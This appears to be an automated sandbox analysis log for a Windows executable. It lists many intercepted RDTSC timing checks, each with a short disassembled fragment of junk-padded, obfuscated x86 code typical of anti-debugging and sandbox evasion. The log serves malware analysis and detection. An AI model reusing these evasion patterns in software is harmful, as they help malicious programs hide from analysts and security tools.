    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCD5EC second address: FCD67E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007FD8346DB1F8h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 jmp 00007FD8346DB1FAh 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push eax 0x0000002c call 00007FD8346DB1F8h 0x00000031 pop eax 0x00000032 mov dword ptr [esp+04h], eax 0x00000036 add dword ptr [esp+04h], 00000018h 0x0000003e inc eax 0x0000003f push eax 0x00000040 ret 0x00000041 pop eax 0x00000042 ret 0x00000043 push 00000000h 0x00000045 push 00000000h 0x00000047 push ebx 0x00000048 call 00007FD8346DB1F8h 0x0000004d pop ebx 0x0000004e mov dword ptr [esp+04h], ebx 0x00000052 add dword ptr [esp+04h], 00000014h 0x0000005a inc ebx 0x0000005b push ebx 0x0000005c ret 0x0000005d pop ebx 0x0000005e ret 0x0000005f jp 00007FD8346DB1FCh 0x00000065 push eax 0x00000066 pushad 0x00000067 push eax 0x00000068 push edx 0x00000069 jmp 00007FD8346DB204h 0x0000006e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCF758 second address: FCF76A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jne 00007FD8346DCB26h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD196C second address: FD1970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD0A74 second address: FD0A8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD8346DCB34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD281F second address: FD2823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD2823 second address: FD2829 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD5863 second address: FD5913 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD8346DB205h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FD8346DB205h 0x0000000f jo 00007FD8346DB1F6h 0x00000015 popad 0x00000016 popad 0x00000017 mov dword ptr [esp], eax 0x0000001a mov bh, ah 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push edi 0x00000021 call 00007FD8346DB1F8h 0x00000026 pop edi 0x00000027 mov dword ptr [esp+04h], edi 0x0000002b add dword ptr [esp+04h], 0000001Ch 0x00000033 inc edi 0x00000034 push edi 0x00000035 ret 0x00000036 pop edi 0x00000037 ret 0x00000038 jmp 00007FD8346DB205h 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push eax 0x00000042 call 00007FD8346DB1F8h 0x00000047 pop eax 0x00000048 mov dword ptr [esp+04h], eax 0x0000004c add dword ptr [esp+04h], 00000019h 0x00000054 inc eax 0x00000055 push eax 0x00000056 ret 0x00000057 pop eax 0x00000058 ret 0x00000059 jmp 00007FD8346DB201h 0x0000005e push eax 0x0000005f pushad 0x00000060 pushad 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD5913 second address: FD5922 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FD8346DCB26h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD5922 second address: FD5926 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD7014 second address: FD7018 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD7018 second address: FD701E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDD02E second address: FDD05B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnl 00007FD8346DCB26h 0x0000000b jnp 00007FD8346DCB26h 0x00000011 jnl 00007FD8346DCB26h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pushad 0x0000001b push edx 0x0000001c push edi 0x0000001d pop edi 0x0000001e pop edx 0x0000001f jmp 00007FD8346DCB2Ah 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDD05B second address: FDD05F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDD05F second address: FDD063 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDD494 second address: FDD4AF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FD8346DB200h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop esi 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE25A9 second address: FE25C6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD8346DCB2Ah 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 jnp 00007FD8346DCB26h 0x00000017 pop edi 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE25C6 second address: FE25CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE26A1 second address: FE26DC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push edx 0x0000000d push eax 0x0000000e jmp 00007FD8346DCB2Dh 0x00000013 pop eax 0x00000014 pop edx 0x00000015 mov eax, dword ptr [eax] 0x00000017 jbe 00007FD8346DCB30h 0x0000001d pushad 0x0000001e push edi 0x0000001f pop edi 0x00000020 jno 00007FD8346DCB26h 0x00000026 popad 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e pushad 0x0000002f popad 0x00000030 pushad 0x00000031 popad 0x00000032 popad 0x00000033 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE278E second address: FE27A7 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD8346DB1FCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE27A7 second address: FE27AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE27AB second address: FE27E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 jnc 00007FD8346DB209h 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007FD8346DB1FFh 0x00000017 popad 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FD8346DB1FDh 0x00000023 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE27E0 second address: FE27E5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE77CE second address: FE77D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE77D4 second address: FE77E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FD8346DCB2Eh 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE77E8 second address: FE7810 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD8346DB201h 0x00000008 jmp 00007FD8346DB202h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE6CED second address: FE6CF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE6E54 second address: FE6E71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD8346DB203h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE9B98 second address: FE9BAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jl 00007FD8346DCB2Ch 0x0000000b jno 00007FD8346DCB26h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEFF1D second address: FEFF79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD8346DB203h 0x00000007 jmp 00007FD8346DB1FBh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jbe 00007FD8346DB207h 0x00000015 jmp 00007FD8346DB200h 0x0000001a jg 00007FD8346DB1F8h 0x00000020 je 00007FD8346DB1FEh 0x00000026 push ebx 0x00000027 pop ebx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEEC3C second address: FEEC40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEEC40 second address: FEEC50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007FD8346DB1FCh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEE97E second address: FEE984 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEE984 second address: FEE989 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEF7D3 second address: FEF7DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF452F second address: FF4544 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD8346DB201h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB9113 second address: FA237D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD8346DCB32h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov edi, ecx 0x0000000e jo 00007FD8346DCB2Dh 0x00000014 push esi 0x00000015 mov edx, 48F758D7h 0x0000001a pop edx 0x0000001b call dword ptr [ebp+122D2F99h] 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FD8346DCB39h 0x00000028 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB95F3 second address: FB95F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB95F7 second address: FB95FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB95FD second address: FB9603 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB96C4 second address: FB96C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB97A8 second address: FB97FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xor dword ptr [esp], 27A341EAh 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007FD8346DB1F8h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 sub ch, 00000061h 0x0000002b ja 00007FD8346DB1FCh 0x00000031 call 00007FD8346DB1F9h 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FD8346DB1FBh 0x0000003d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB97FF second address: FB983D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD8346DCB37h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jbe 00007FD8346DCB26h 0x00000013 jmp 00007FD8346DCB38h 0x00000018 popad 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB99AE second address: FB99EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD8346DB206h 0x00000009 popad 0x0000000a jmp 00007FD8346DB203h 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jnl 00007FD8346DB1FCh 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB9A72 second address: FB9A76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB9A76 second address: FB9A7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB9A7C second address: FB9AAA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jc 00007FD8346DCB26h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jg 00007FD8346DCB32h 0x00000016 mov eax, dword ptr [eax] 0x00000018 push eax 0x00000019 push edx 0x0000001a ja 00007FD8346DCB28h 0x00000020 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB9AAA second address: FB9AC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD8346DB203h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB9BD5 second address: FB9BFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD8346DCB2Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FD8346DCB2Eh 0x0000000e popad 0x0000000f push eax 0x00000010 jo 00007FD8346DCB38h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB9BFF second address: FB9C03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB9CF2 second address: FB9D10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD8346DCB39h 0x00000009 popad 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB9D10 second address: FB9D7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FD8346DB204h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007FD8346DB1F8h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000017h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 movzx edi, bx 0x00000029 push 00000004h 0x0000002b push 00000000h 0x0000002d push edi 0x0000002e call 00007FD8346DB1F8h 0x00000033 pop edi 0x00000034 mov dword ptr [esp+04h], edi 0x00000038 add dword ptr [esp+04h], 00000018h 0x00000040 inc edi 0x00000041 push edi 0x00000042 ret 0x00000043 pop edi 0x00000044 ret 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a ja 00007FD8346DB1F6h 0x00000050 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB9D7A second address: FB9D8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD8346DCB2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB9D8C second address: FB9D91 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBA16B second address: FBA18A instructions: 0x00000000 rdtsc 0x00000002 js 00007FD8346DCB26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD8346DCB33h 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBA573 second address: FBA5B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebx 0x0000000a call 00007FD8346DB1F8h 0x0000000f pop ebx 0x00000010 mov dword ptr [esp+04h], ebx 0x00000014 add dword ptr [esp+04h], 00000016h 0x0000001c inc ebx 0x0000001d push ebx 0x0000001e ret 0x0000001f pop ebx 0x00000020 ret 0x00000021 adc edx, 60C17662h 0x00000027 lea eax, dword ptr [ebp+12488E6Ah] 0x0000002d mov ecx, dword ptr [ebp+12462940h] 0x00000033 xor dx, D16Ah 0x00000038 nop 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c jbe 00007FD8346DB1F6h 0x00000042 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBA5B9 second address: FBA5CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD8346DCB2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBA5CB second address: FBA60A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jne 00007FD8346DB1F8h 0x0000000f push eax 0x00000010 push edi 0x00000011 pop edi 0x00000012 pop eax 0x00000013 popad 0x00000014 nop 0x00000015 jne 00007FD8346DB1FBh 0x0000001b lea eax, dword ptr [ebp+12488E26h] 0x00000021 mov dword ptr [ebp+122D220Dh], edi 0x00000027 xor dword ptr [ebp+122D2255h], edi 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 jp 00007FD8346DB1F8h 0x00000036 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBA60A second address: FA2EA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD8346DCB35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c call dword ptr [ebp+12468CBBh] 0x00000012 js 00007FD8346DCB3Eh 0x00000018 push eax 0x00000019 push edx 0x0000001a jns 00007FD8346DCB26h 0x00000020 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF3591 second address: FF3597 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF3597 second address: FF359D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF3703 second address: FF3708 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF3859 second address: FF38A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jns 00007FD8346DCB26h 0x0000000b jmp 00007FD8346DCB32h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FD8346DCB39h 0x00000018 jmp 00007FD8346DCB30h 0x0000001d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF38A2 second address: FF38D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD8346DB208h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD8346DB1FFh 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF38D3 second address: FF38EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD8346DCB38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF38EF second address: FF38FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jnc 00007FD8346DB1F6h 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF3A78 second address: FF3A9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FD8346DCB2Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007FD8346DCB2Eh 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF3A9D second address: FF3ACA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD8346DB204h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FD8346DB203h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF3ACA second address: FF3ACE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF3ACE second address: FF3AD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF3F1B second address: FF3F27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FD8346DCB26h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF4088 second address: FF40CA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edx 0x00000004 pop edx 0x00000005 jg 00007FD8346DB1F6h 0x0000000b pop edi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f jmp 00007FD8346DB208h 0x00000014 pushad 0x00000015 jmp 00007FD8346DB208h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF9EB6 second address: FF9EBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF885C second address: FF886E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 pop eax 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jo 00007FD8346DB1F6h 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF8B81 second address: FF8B96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD8346DCB31h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF8E29 second address: FF8E2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF8E2D second address: FF8E33 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF8E33 second address: FF8E3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF8E3B second address: FF8E3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF8E3F second address: FF8E4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FD8346DB1F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF8FF0 second address: FF9001 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD8346DCB2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
